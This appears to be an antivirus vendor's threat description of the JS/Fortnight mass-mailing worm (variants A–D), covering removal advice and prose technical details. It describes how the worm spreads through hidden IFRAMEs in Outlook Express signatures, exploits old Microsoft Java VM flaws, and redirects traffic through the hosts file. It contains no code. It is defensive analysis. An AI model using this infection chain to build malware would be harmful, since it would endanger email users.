Threat Descriptions

Fortnight

Classification

Category :

Malware

Type :

Worm

Platform :

W32

Aliases :

Fortnight

Summary

JS/Fortnight is a slow mass mailer written in JavaScript which spreads in HTML formatted messages.

Removal

Based on the settings of your F-Secure security product, it will either move the file to the quarantine where it cannot spread or cause harm, or remove it.

A False Positive is when a file is incorrectly detected as harmful, usually because its code or behavior resembles known harmful programs. A False Positive will usually be fixed in a subsequent database update without any action needed on your part. If you wish, you may also:

  • Check for the latest database updates

    First check if your F-Secure security program is using the latest updates, then try scanning the file again.

  • Submit a sample

    After checking, if you still believe the file is incorrectly detected, you can submit a sample of it for re-analysis.

    Note: If the file was moved to quarantine, you need to collect the file from quarantine before you can submit it.

  • Exclude a file from further scanning

    If you are certain that the file is safe and want to continue using it, you can exclude it from further scanning by the F-Secure security product.

    Note: You need administrative rights to change the settings.

Technical Details

The infected email message contains a hidden link to a web page. This page contains the actual worm code. When the user opens the message, the link activates using an invisible IFRAME.

The code on the web page activates by using the Microsoft VM ActiveX vulnerability. This vulnerability has been fixed, and a patch is available from Microsoft:

https://www.microsoft.com/technet/security/bulletin/ms00-075.asp

The code uses cookie "TF" as an infection marker. If the cookie is not present, the worm changes browser's startup page via registry to an adult web site.

Next the worm replaces the default Outlook Express 5.0 signature to a file "C:\Program Files\sign.htm". This file contains the hidden iframe that activates the link silently. After this, all messages sent by the user using Outlook Express contains the hidden link to the malicious web page.

The worm then adds three links to the Favorites folder, as follows:

  • SEXXX. Totaly Teen
  • Make BIG Money
  • 6544 Search Engines Submission

Finally, the worm sets two cookies, "TF" and "RF". The first cookie expires after 14 days and the second one expires after one day. The web page where JS/Fortnight.A@m was available, is already closed, which means this variant cannot infect any longer.

Fortnight.B

Similar to JS/Fortnight.A, the JS/Fortnight.B infected messages contain a hidden IFRAME to a web site that will redirect to a page that contains the worm code that executes using the Microsoft VM ActiveX vulnerability.

When executed, the worm creates a file "s.htm" into the Windows installation directory and alters the signature settings of Outlook Express 5.0 so that every message sent by the user will contain the IFRAME link.

The worm also creates the file "hosts" into the Windows installation directory, which contains the following comments in the beginning: 

# Copyright (c) 1998 Microsoft Corp.
#
# end of file.

This file, in Windows 95, 98 and ME, will cause the connections to certain web sites to be redirected to one of the two IP addresses set by the worm instead of their real addresses.

Fortnight.C

When a user opens or views an infected email, the invisible frame embedded into the message will be activated. This causes the browser to connect to a web site that contains a small javascript code. The javascript code will in turn download and activate the Java applet ("a.jar") that contains this worm code.

When the .JAR file is executed, it uses Microsoft Internet Explorer VerifierBug vulnerability to get full privileges by escaping the Java security, and execute its code. The JAR file will then alter the Internet Explorer search settings and add three pages into the Favorites folder.

Furthermore, the worm disables the Internet Explorer's Security and Advanced tabs from the settings dialog.

The .JAR will then drop two files, "hosts" and "s.htm" to the Windows installation directory. It modifies the registry so that Outlook Express will use the "s.htm" file as the default signature. The "hosts" file contains a set of domain names that will be redirected to a different web site instead of the real addresses. The redirection works only in Windows 95, 98 and ME. The "hosts" file has to be removed manually from the infected system.

Additionally, the changes into Internet Explorer settings will cause the web sites accessed via Internet Explorer without specifying the protocol (http://) will be redirected to another web site. This web site will then redirect the browser to the correct address.

Fortnight.D

This variant is functionally similar to the Fortnight.C.

In Fortnight.D, the Outlook Express signature file "s.htm" is an encoded script. When the script is executed, the browser connects to the web site causing the download and execution of the Java applet. This applet has been renamed to "c.jar".

Additionally, this variant adds five buttons to the Internet Explorer toolbar and creates an empty "hosts" file.

Variant:Fortnight.A

The infected email message contains a hidden link to a web page. This page contains the actual worm code. When the user opens the message, the link activates using an invisible iframe. The code on the web page activates by using the Microsoft VM ActiveX vulnerability. This vulnerability has been fixed, and a patch is available from Microsoft: http://www.microsoft.com/technet/security/bulletin/ms00-075.asp The code uses cookie "TF" as an infection marker. If the cookie is not present, the worm changes browser's startup page via registry to an adult web site. Next the worm replaces the default Outlook Express 5.0 signature to a file "C:\Program Files\sign.htm". This file contains the hidden iframe that activates the link silently. After this all messages sent by the user with Outlook Express contain the hidden link to the malicious web page. Then the worm adds three links to the Favorites folder, as follows: SEXXX. Totaly Teen Make BIG Money 6544 Search Engines Submission Finally the worm sets two cookies, "TF" and "RF". The first cookie expires after 14 days and the second one expires after one day. The web page where JS/Fortnight.A@m was available, is already closed, which means this variant cannot infect any longer.

Variant:Fortnight.B

Similar to JS/Fortnight.A, the JS/Fortnight.B infected messages contain a hidden IFRAME to a web site that will redirect to a page that contains the worm code that executes using the Microsoft VM ActiveX vulnerability. When executed, the worm creates a file "s.htm" into Windows installation directory and alters the signature settings of Outlook Express 5.0 so that every message sent by the user will contain the IFRAME link. The worm also creates file "hosts" into the Windows installation directory, that contains the following comments in the beginning: # Copyright (c) 1998 Microsoft Corp. # # end of file. This file, in Windows 95, 98 and Me, will cause that connections to certain web sites will be redirected to one of the two IP addresses set by the worm instead of their real addresses.

Variant:Fortnight.C

When a user opens or views an infected email, the invisible frame embedded into message will be activated. This causes the browser to connect a web site that contains a small javascript code. The javascript code will in turn download and activate the Java applet ("a.jar") that contains the worm code. When the JAR file is executed it uses Microsoft Internet Explorer VerifierBug vulnerability to get full privileges by escaping the Java security, and execute its code. Then the JAR will alter the Internet Explorer search settings and add three pages to the Favorities folder. Further, the worm disables Internet Explorer both Security and Advanced tabs from the settings dialog. The JAR will then drop two files, "hosts" and "s.htm" to the Windows installation directory. It modifies the registry so that Outlook Express will use the "s.htm" file as the default signature. The "hosts" file contains a set of domain names that will be redirected to a different web site instead of the real addresses. The redirection works only in Windows 95, 98 and Me. The "hosts" file has to be removed manually from the infected system. Additionally the changes into Internet Explorer setting will cause that the web sites accessed via Internet Explorer without specifying the protocol (http://) will be redirected to another web site. This web site will then redirect the browser to correct address. Further information about the vulnerability in the Microsoft Java VM, including a fix, is available at: http://www.microsoft.com/technet/security/bulletin/ms03-011.asp

Variant:Fortnight.D

This variant is functionally similar to the Fortnight.C. In Fortnight.D, the Outlook Express signature file "s.htm" is an encoded script. When the script is executed, the browser connects to the web site causing the download and execute of the Java applet. This applet has been renamed to "c.jar". Additionally this variant adds five buttons to the Internet Explorer toolbar and creates an empty "hosts" file. Further information about the vulnerability in the Microsoft Java VM, including a fix, is available at: http://www.microsoft.com/technet/security/bulletin/ms03-011.asp